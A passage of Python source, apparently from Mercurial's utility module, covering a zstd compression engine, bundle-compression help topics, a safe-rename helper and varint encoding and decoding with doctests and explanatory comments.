                if len(compressed) < insize:
                    return compressed
                return None
            else:
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.StorageError(_('revlog decompress error: %s') %
                                         stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())

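# Illustrative sketch (not part of the original module): with the engines
# above registered, servers sort zstd (priority 50) ahead of zlib (20);
# bzip2 and 'none' carry priority 0 and so are not advertised to peers.
#
#     names = [e.name() for e in compengines.supportedwireengines(SERVERROLE)]
#     # -> ['zstd', 'zlib', 'bzip2', 'none'] when the zstd module is available
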
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = b'``%s``\n    %s' % (bt[0], pycompat.getdoc(engine.bundletype))

        value = docobject()
        value.__doc__ = pycompat.sysstr(doc)
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace

def safename(f, tag, ctx, others=None):
    """
    Generate a name that it is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = '%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = '%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn

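# Illustrative usage (not part of the original module), where ``ctx`` stands
# for any context object supporting the ``in`` operator:
#
#     safename('foo.txt', 'resolve', ctx)
#     # -> 'foo.txt~resolve', or 'foo.txt~resolve~1', 'foo.txt~resolve~2', ...
#     #    when earlier candidates already exist
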
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(_("stream ended unexpectedly"
                            " (got %d bytes, expected %d)")
                          % (len(s), n))
    return s

def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    bits = value & 0x7f
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7f
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return ''.join(bytes)

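# Worked example (not part of the original module): 1337 is 0b10100111001.
# The low 7 bits (0111001 = 0x39) are emitted first with the continuation
# bit set (0x80 | 0x39 = 0xb9), then the remaining bits (0b1010 = 0x0a)
# without it, matching the '\xb9\n' doctest above.
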
def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= ((byte & 0x7f) << shift)
        if not (byte & 0x80):
            return result
        shift += 7
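
# Illustrative round trip (not part of the original module):
#
#     import io
#     for value in (0, 1, 127, 1337, 65536):
#         assert uvarintdecodestream(io.BytesIO(uvarintencode(value))) == value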